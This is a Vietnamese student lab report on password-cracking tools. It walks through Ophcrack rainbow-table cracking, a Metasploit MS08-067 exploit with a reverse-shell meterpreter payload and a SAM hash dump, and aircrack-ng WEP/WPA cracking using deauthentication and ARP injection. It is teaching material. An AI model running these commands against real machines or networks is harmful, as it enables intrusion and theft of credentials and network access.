intTypePromotion=1

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất

Chia sẻ: Nguyen Quoc Hung | Ngày: | Loại File: DOCX | Số trang:71

0
121
lượt xem
30
download

Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng.Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài...

Chủ đề:
Lưu

Nội dung Text: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất

  1. BÔ GIAO DUC VA ĐAO TAO ̣ ́ ̣ ̀ ̀ ̣ TRƯỜNG ĐẠI HỌC MỞ TPHCM KHOA CÔNG NGHỆ THÔNG TIN  Giáo Viên Hướng Dẫn : T.S Đào Thế Long Sinh viên: 1. Phan Công Lâm, Mssv:09H1012053 2.Nguyễn Thúc Toàn,Mssv:09H1012110 3.Nguyễn Huy Tưởng,Mssv:09H1012125 10, tháng 11, năm 2010 Ophcrack là phần mềm khôi phục mật khẩu Windows miễn phí tốt nhất hiện nay.Đối với  người được trang bị những hiểu biết cơ bản về hệ điều hành mà lần đầu tiên muốn khôi  phục mật khẩu thì Ophcrack quả là một công cụ rất nhanh và dễ dàng sử dụng. Để sử dụng Ophcrack, bạn không cần phải truy cập vào Windows để phục hồi mật khẩu  đã mất.Ophcrack cung cấp cho bạn file ISO miễn phí và bạn có thể ghi ra đĩa CD rồi  khởi chạy đĩa CD đó. Khi chương trình Ophcrack đã chạy, bạn xác định vị trí tài khoản  người dùng Windows và thực hiện quá trình khôi phục mật khẩu. Tất cả các bước thực  hiện hoàn toàn là tự động. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 1
  2. 1. Cài đặt OPHCRACK Việc cài đặt Ophcrack tương đối dễ, tuy nhiên có phần lựa chọn các thành phần cài đặt  cần lưu ý –Hình 1. Hình 1: Chọn các compornents để cài đặt vào mục tables cho ophcrack Trên Hình 1, nếu đã download, có thể lựa chọn một số lựa chọn sau: ­ Continue without install the table: Cài đặt chỉ có chương trình Ophcrack, khôngcó  Rainbow Table. ­ Download alphanumenic table from Internet (388MB­SSTI04­10K): cài đặt và  download Rainbow Table loại SSTI04­10K. ­ Download alphanumenic table from Internet (733MB­SSTI04­5K): cài đặt và download  Rainbow Table loại SSTI04­5K. ­ Install alphanumenic table from CD or DVD (388MB­SSTI04­10K): cài đặt Ophcrack và  sử dụng Rainbow Table loại SSTI04­10K từ CD hoặc DVD. ­ Install alphanumenic table from CD or DVD (733MB­SSTI04­5K): cài đặt Ophcrack và  sử dụng Rainbow Table loại SSTI04­5K từ CD hoặc DVD. Rainbow Table loại SSTI04­5K có kích thước 733MB được dùng cho các máy tính có  RAM từ 512MB trở lên. Rainbow Table loại SSTI04­10K có kích thước 388MB được dùng  cho các máy tính ít RAM hơn. Nếu trong trường hợp bạn download riêng đĩa LiveCD, hoặc download các Rainbow  Table theo link dưới đây, thì lựa chọn Continue without install the table. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 2
  3. Code: Rainbow Table loại SSTI04­10K (388MB)  http://lasecwww.epfl.ch/SSTIC04­10k.zip  Rainbow Table loại SSTI04­5K (733MB)  http://lasecwww.epfl.ch/SSTIC04­5k.zip Sau khi cài đặt, chạy chương trình, giao diện của Ophcrack như Hình 2. Hình 2: Giao diện Ophcrack trên Windows Trên hình 2, trước khi sử dụng, click vào nút Tables để chọn đường dẫn đến bảng  Rainbow Table – hình 3. Hình 3: Select ophcrack table. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 3
  4. Trên Hình 3, mở đến đĩa LiveCD, mục slax\ophcrack\tables, sau đó nhắp OK. 2. Kết hợp metasploit với ophcrack crack password window winxp sp2. Trong ví dụ này chúng ta sẽ dùng backtrack 4, trong đĩa backtrack này có tích hợp sẵn  metasploit và ophcrack. Sau đây là các bước để thực hiện các bước crack một password  của window xp sp2. ở đây ta sẽ lợi dụng lỗi bảo mật “Microsoft Security Bulletin MS08­067 của Microsoft cho  Windows Server Service” để khai thác thông tin. Đây là lỗ hổng nghiêm trọng nằm trong  dịch vụ Server Service RPC của hệ điều hành Windows.Với lỗi này, Hacker hoàn toàn  có thể điều khiển máy tính từ xa với quyền cao nhất của hệ thống. Mức độ nguy hiểm: Rất cao. Mô tả kỹ thuật Server Service là dịch vụ cho phép máy tính cài đặt hệ điều hành Windows có thể chia  sẻ file, máy in,… qua mạng và là dịch vụ không thể thiếu của hệ điều hành. Dịch vụ này  hỗ trợ giao thức  RPC, trong đó có một chức năng tiếp nhận và xử lý một yêu cầu muốn  chuyển đổi đường dẫn  (vídụ \\C\Program Files\..\Windows) về định dạng đường dẫn  Canonicalization (\\C\Windows). Tuy nhiên, quá trình xử lý này đã không kiểm soát độ  dài của đường dẫn trong yêu cầu và xảy ra lỗi tràn bộ đệm. Như vậy, với việc thực hiện một yêu cầu RPC với đường dẫn có độ dài “quá khổ”,  Hacker dễ dàng thực thi mã độc trên các máy tính từ xa nhằm chiếm quyền điều khiển,  cài đặt virus, ăn cắp thông tin… Các bước thực hiện Bước 1: Khi chúng ta khởi động backtrack. Chúng ta mở một console và gõ lệnh theo  cú pháp sau để chạy metasploit. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 4
  5. Theo như tấm hình này ta sẽ sử dụng metasploit phiên bản 3. Bước2: ta gõ cú pháp : “use exploit/windows/smb/ms08_067_netapi” để sử dụng lỗi bảo  mật này. Bước3 : ở bước này ta sẽ thực hiện các lệnh để cấu hình các thuộc tính để chuẩn bị cho  cuộc tấn công chiếm quyền điều khiển. Cú pháp : set payload windows/meterpreter/reverse_tcp //Meta­Interpreter là một advanced  payload. Muc đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các  máy remote computers.Nó được viết từ các developers dưới dạng shared object( DLL)  files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn  không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống  virus  Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên các remote  computers. set RHOST 192.168.1.1  // đây là địa chỉ ip của máy victim. set LHOST 192.168.1.2 // đây là địa chỉ ip của máy tấn công. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 5
  6. Khi đã chuẩn bị xong các cấu hình ta sẽ có một bảng với các thong số như hình trên. Bước4: ở bước này ta sẽ tiến hành khai thác lỗi. Bước5 : Khi đã vào được máy victim. Ta dung lệnhh ashdump để hash files an trong  window xp. Bước6 :Ở bước thứ 5 ta đã hash dump được file sam trong win. Ta sẽ copy đoạn hash  dump đó vào trong file text. Và lưu lại. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 6
  7. Bước7 :ta khởi động chương trình ophcrack GUI và tiến hành crack mật khẩu. Ta sẽ  load file hash đã được tạo từ bước 6 vàovà nhấn nút crack. Và đợi chờ kết quả của  chương trình trả về. Lưu ý :Khi sử dụng ophcrack chúng ta phải có bộ directories của rainbow table. Chúng  ta có thể download các tables đó ở đây. Link download :http://sourceforge.net/projects/ophcrack/files/tables/ Dưới đây là các hình ảnh dung phần mềm  ophcrack để crack file hash. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 7
  8. Hình1 : load file hash đã copy được Hình2 :Nhấn nút crack để bắt đầu crack mật khẩu file hash Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 8
  9. Hình3 :Khi chạy xong chúng ta sẽ thấy password đã được crack hiển thị ở cột NT Pwd. I.Giới Thiệu Về Wireless Lan(wlan),WEP,WPA • WLAN là một loại mạng máy tính nhưng việc kết nối giữa các thành phần trong  mạng không sử dụng các loại cáp như một mạng thông thường, môi trường  truyền thông của các thành phần trong mạng là không khí. Các thành phần trong  mạng sử dụng sóng điện từ để truyền thông với nhau.Institute of Electrical and  Electronics Engineers(IEEE) đã phê chuẩn sự ra đời của chuẩn 802.11, với tên  gọi WIFI (Wireless Fidelity) cho các mạng WLAN.Là một bộ giao thức cho thiết bị  không dây dựa trên chuẩn 802.11a/b/g  bao gồm các Access Point và các thiết bị  đầu cuối không dây như pc card, usb card, wifi PDA… kết nối với nhau. Wifi hiện  nay có 3 kiểu mã hoá chính gồm: WEP­Wired Equivalent Privacy , WPA­Wireless  Protected Access và WPA2.  • WEP (Wired Equivalent Privacy) là một hệ thống dùng để mã hóa, giải mã dữ  liệu và bảo mật dữ liệu cho mạng Wireless, WEP là một phần của chuẩn 802.11  gốc dựa trên thuật toán mã hóa RC4, mã hóa dữ liệu 40bit để ngăn chặn sự truy  cập trái phép từ bên ngoài.  Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 9
  10. • WPA (Wi­fi Protected Access) được thiết kế nhằm thay thế cho WEP vì có tính  bảo mật cao hơn. Temporal Key Intergrity Protocol (**IP), còn được gọi là WPA  key hashing là một sự cải tiến dựa trên WEP, là vì nó tự động thay đổi khóa, điều  này gây khó khăn rất nhiều cho các Attacker dò thấy khóa của mạng.Mặt khác  WPA cũng cải tiến cả phương thức chứng thực và mã hóa. WPA bảo mật mạnh  hơn WEP rất nhiều.  II.Aircrack­ng: II.1-Giới thiệu Aircrack-ng: Hầu như hiện nay khi nhắc tới Crack password Wireless thì chúng ta nghĩ ngay đến  chương trình Aircrack. Aircrack là chương trình crack password wireless rất mạnh, một  công cụ bẻ khóa WEP/WPA nhanh nhất,chạy được trên Windows và Linux. Aircrack hỗ trợ các chuẩn không giây 802.11a/b/g dùng để Crack WEP và WPA­PSK.  Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512­bits và đủ  cho giải mã hầu hết các gói tin trên mạng Wireless. Công cụ này còn hỗ trợ để bẻ khóa  WPA1 và WPA2 bằng phương thức Brute Force Attack. Ngoài ra với airdecap chúng có  khả năng giải mã các file được mã hóa bởi WEP và WPA. II.2 Aircrack-ng hỗ trợ việc lựa chọn card wireless thích hợp: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 10
  11. Linux  Antenn Windows  Tên Card Loại Chipset  hỗ  a  hỗ trợ trợ Airlink AWLC4030 CardBus Atheros Nội bộ airodump-ng Có Belkin F5D7010ed CardBus Atheros Nội bộ Có ExpressCar Belkin F5D8071 Atheros Nội bộ Có d Chưa xác ExpressCar nhận D-Link DWA-643 Atheros Nội bộ Có d Prism D-Link DWL-650 PCMCIA Nội bộ airodump-ng Có 2,5 D-Link DWL-G630 C2 CardBus Atheros Nội bộ airodump-ng Có v3.01 D-Link DWL-G630 E1 Ralink Atheros Nội bộ Airodump-ng Có D-Link DWL-G650 CardBus Atheros Nội bộ Airodump-ng Có C3 , C4 , B5 C3, C4, B5 Linksys WPC55AG CardBus Atheros Nội bộ có Có v1.2 v1.2 MSI CB54G2 CardBus Ralink Nội bộ Không Có Netgear WAG511 CardBus Atheros Nội bộ Airodump-ng có Netgear WG511T CardBus Atheros Nội bộ Airodump-ng có Netgear WG511U CardBus Atheros Nội bộ Airodump-ng có Proxim 8470-WD CardBus Atheros MMCX không có Senao NL-2511 Prism CD PLUS EXT CD PLUS PCMCIA MMCX không có 2,5 EXT SMC SMCWCBT-G CardBus Atheros Nội bộ Airodump-ng có Nội bộ TP-Link TL-WN610G CardBus Atheros Airodump-ng có TRENDnet TEW-441PC CardBus Atheros Nội bộ Airodump-ng có Ubiquiti SRC CardBus Atheros MMCX Airodump-ng có Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 11
  12. Khuyến cáo ta nên dùng card Atheros chipset. II.2-Một số điều cần biết khi Crack Password: 1. Card mạng của bạn không chuyển về chế độ monitor được – hãy xem danh sách card  được hỗ trợ trên trang trên. 2. Chỉ có thể dò được khóa WPA/WPA2­PSK3. Change mac address có thể sẽ gặp lỗi  không authentication được. 4. Sự im lặng của router: nếu trong mạng của AP không có máy con kết nối thì ta sẽ  nhanh chóng nhận ra là mình không hề bắt được một gói tin ARP nào hết. Lý do là các  AP đời sau này đã được harderning, chúng rất yên lặng, khó mà cạy ra được một gói tin  ARP nào. Giải pháp:là hãy thử crack nó vào một thời gian khác  hoặc dùng mdk3 để cố  gắng reset AP, khi AP khởi động lại, nó sẽ quăng ra một ít gói tin ARP, dùng koreK hoặc  fragment để crack chúng thôi  5.Khi bạn dùng Aireplay mà thấy gói tin gởi đi nhưng không có trả lời (ACK) thì mình  phải chuyển sang STATION khác và áp dụng tương tự. 6.Dùng lệnh aireplay­ng mà thấy data tăng lên thì mới được chứ data mà đứng yên thì  thua rồi. 7. Khi không thể chứng thực với AP thì có nhiều nguyên nhân, sai kênh, sai MAC  AP(BSSID), quá xa, không có Client nào đang kết nối với AP. II.3­ Tiến Trình Chi Tiết Để Crack Password. 1. Xem interface của card mạng _iwcofig  hoặc __ifcofig  để xem có những card mạng nào trong máy, thường là eth0 và  wlan0(chúng ta sẽ dùng wlan0) 2. Chuyển wlan0 về chế độ nghe ngóng _airmon­ng wlan0 start. Lệnh này sẽ tạo ra một card wireless ảo là mon0 3. Scan mạng wireless trong vùng bắt sóng.  _airodump­ng wlan0(mon0) để bắt sóng wifi.  4. Tiến hành bắt gói tin _airodump­ng  ­­channel [AP channel]­­bssid [MAC AP ] ­­write capturefile wlan0 bắt gói tin của AP trên kênh nào đó với cái BSSID là MAC của AP và ghi ra một tên file . 5. Tiến hành bắt tay với AP để tạo ra dòng tín hiệu. _ aireplay­ng ­1 0 ­a  ­c  wlan0 Trong cơ chế bảo mật WPA, khi muốn kết nối với AP thì Client cần phải gởi gói tin chứa  4­way handshake đến AP, trong gói tin đó chứa password(đã được hash) của mạng. Để  Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 12
  13. được password ta phải có gói tin trên.  Lưu ý: aireplay­ng ­1 0: gởi tin tới AP tới bao giờ được chứng thực Ý nghĩa của lệnh này là AP sẽ thông báo Client đã bị đá ra khỏi mạng và client sẽ phải  gửi gói tin chứa 4­way handshake để yêu cầu kết nối lại. Khi đó máy của hacker ta sẽ  bắt được gói tin 6.Tạo cơ sở dữ liệu Dùng lệnh theo thứ tự: _airolib­ng crackwpa import essid essid.txt   để tạo CSDL tên là crackwpa và import cái tên AP vào trong cái file essid.txt mình đã  tạo sẵn. ­airolib­ng crackwpa import passwd /đường dẫn tới file password.lst  ­airolib­ng crackwpa ­­batch: Kết hợp essid với password ­airolib­ng crackwpa stats: kiểm tra tính hợp lệ Mục đích phần này là ta sẽ so sánh password với cái CSDL có trong Backtrack, vì thực  chất việc dò password là so sánh gói tin với list pass có sẵn trong máy 7.Crack capture file, tìm khoá password wep,wpa. _aircrack­ng ­b [AP BSSID] [capture file(s) name] _aircrack­ng ­r crackwpa wpa*.cap Aircrack sẽ bắt đầu lục lọi trong số những gói dữ liệu đã bắt được để tìm ra khóa WEP. III.Crack Password Wireless WEP Bằng Aircrack   Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 13
  14. 1.Chuẩn bị : 1.1.Phần cứng : _ 1 AP có hỗ trợ bảo mật WEP  _ 1 PC có wireless card kết nối với AP­> Client _ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)­>  Attacker  1.2.Phần mềm : PC của Attacker :  _ HĐH Linux (mình sẽ dùng BackTrack 4) _ HĐH Windows _ Aircrack­ng 2. Crack Password Wireless WEP Bằng Aircrack   2.1.Các bước cơ bản :  _ Bước 1 : chuyển wireless card về chế độ monitor _ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target _ Bước 3 : bơm gói ARP để tăng lưu lượng dữ liệu bắt được  _ Bước 4 : sau khi bắt đủ gói dữ liệu , dùng aircrack­ng dò password 2.2.Thực hiện crack WEP: Bước 1 : Xem các interface của card mạng : Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 14
  15. Trường hợp này wireless card có interface là wlan0 Chuyển wlan0 về chế độ Monitor airmon­ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0 Bước 2 : Scan mạng wireless trong “vùng bắt sóng” của wireless card Trong “vùng bắt sóng” của wireless card có 2 AP có WEP , 1 AP là SSID là Diep , 1 AP  là quang1 (AP này có Power là ­1 tức là mạng ad­hoc) (ngoài ra còn có 1 AP mà cột ESSID ghi là  tức là AP ẩn , Hidden SSID) Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 15
  16. AP mà ta quan tâm là Diep có BSSID (MAC Address) 00:14:6C:06:D7:96 , ESSID (tên  định danh của mạng) Diep , Channel là 11, và đang có 2 client kết nối . (tắt process airodump­ng mon0 đi) Em xin giải thích một số thông số chính: • BSSID: địa chỉ Mac của AP cần hack, có bao nhiêu AP sẽ được liệt kê hết ở đây.  • PWR: là power ,chỉ độ mạnh yếu của mạng, power = ­1 đó là mạng adhoc. • Beacons: là các mốc kết nối • #Data: số data luân chuyển trong mạng. Dữ liệu càng cao càng tốt. • #/s : là số lượng packet chuyển trong mạng trong 1 s.Tốc độ kết nối càng cao càng tốt. • CH là channel (Kênh kết nối), một thông số quan trọng trong việc crack khóa. • Thông số MB là chuẩn của AP: 11 MB là chuẩn b, 54 MB là chuẩn g. • ESSID là tên của mạng(AP), nếu AP đang ẩn tên thì nó sẽ có dạng . • ENC : Bảo mật theo giao thức nào đó WEP, WPA, WPA2,... • CIPHER: Mã hóa theo kiểu nào đó CCMP, WEP,... • AUTH: Chứng thực theo kiểu nào đó PSK, TKIP,... • STATION: MAC của Client đang kết nối tới AP. Ta sẽ bắt dữ liệu từ AP Diep ­c 11 : channel của AP ­w wep : dữ liệu bắt được sẽ lưu vào file wep.cap (4 file wep* sẽ được tạo ra , xem hình  bên dưới) ­d 00:14:6C:06:D7:96 : BSSID của AP mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ bắt các gói dữ liệu đi qua AP có MAC là  00:14:6C:06:D7:96 trên kênh 11 và ghi vào file wep.cap Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 16
  17. Những Client có PoWeR ­1 là những client “bất hoạt” hoặc “ngoài vùng bắt sóng” của  wireless card , ta chỉ cần quan tâm đến client có BSSID là 00:13:E8:BE:E9:C5. Bước 3 : Theo lý thuyết , muốn dò ra password của AP thì phải cần ít nhất khoảng 200.000 gói  dữ liệu (tức là cột #data phải đạt đến con số 200.000) , nhưng trên thực tế thì khi data  đạt đến 20.000­50.000 là có thể dò ra password. Nếu cứ để lệnh airodump­ng bắt dữ liệu không thôi thì có khi đợi cả ngày vẫn chưa có  20.000 gói dữ liệu , do đó ta phải bắt và “bơm” các gói ARP để tăng lưu lượng dữ liệu  qua lại aireplay­ng ­3 : standard ARP­request replay ­x 1000 : “bơm” 1000 gói mỗi giây (max là 1024 gói, mặc định là 500) ­b 00:14:6C:06:D7:96 : MAC address, Access Point ­h 00:13:E8:BE:E9:C5 : set Source MAC address , tức là MAC của client mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả client 00:13:E8:BE:E9:C5 để “bơm” ARP vào AP  00:14:6C:06:D7:96, mỗi giây 1000 gói. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 17
  18. Các gói ARP được tạo ra khi client có yêu cầu kết nối với AP , vì vậy ta phải “đá” client  ra : aireplay­ng ­0 1 : deauthenticate 1 lần ­a 00:14:6C:06:D7:96 : set Access Point MAC address ­c 00:13:E8:BE:E9:C5: set Destination MAC address mon0 : interface ảo của wireless card dùng cho việc monitor => lệnh này có nghĩa là : mon0 sẽ giả danh AP 00:14:6C:06:D7:96 và gởi đến client  00:13:E8:BE:E9:C5 thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói  ARP yêu cầu kết nối lại với AP. Lúc này lệnh aireplay­ng ­3 ở trên sẽ bắt được gói ARP  và “bơm” nó vào AP  Quay lại cửa sổ của lệnh airodump­ng và aireplay­ng ta sẽ thấy cột #Data tăng lên rất  nhanh Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 18
  19. Bước 4 :  Đến khi cột #Data được trên 20.000 gói thì ta bắt đầu dò password từ file .cap (được tạo  ra ở bước 2) bằng lệnh aircrack­ng  Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 19
  20. Password dò được là 0987177185 (sau khi đã lọc ra các dấu “ : “ ) IV.Crack Password Wireless WPA Bằng Aircrack   IV.1-Chuẩn bị : a).Phần cứng : _ 1 AP có hỗ trợ bảo mật WPA  _ 1 PC có wireless card kết nối với AP­> Client _ 1 PC có wireless card là Atheros có hỗ trợ monitor và chế độ injection(chèn gói tin)­>  Attacker b).Phần mềm : PC của Attacker :  _ HĐH Linux (ở đây sẽ là BackTrack 4) _ HĐH Windows _ Aircrack­ng _ 1 file từ điển chứa các từ khóa có khả năng là password , hoặc 1 pre­computed  database (dùng airolib­ng để tạo) IV.2. Crack Password Wireless WPA Bằng Aircrack   IV.2.1.Các bước cơ bản : _ Bước 1 : chuyển wireless card về chế độ monitor _ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target _ Bước 3 : bắt 4­way handshake  _ Bước 4 : dùng aircrack­ng + file từ điển (hoặc pre­computed database) để dò  password IV.2.2.Thực hiện Crack Password Wireless WPA: Bước 1 : Xem các interface của card mạng : Trường hợp này wireless card có interface là wlan0 Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 20
ADSENSE
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2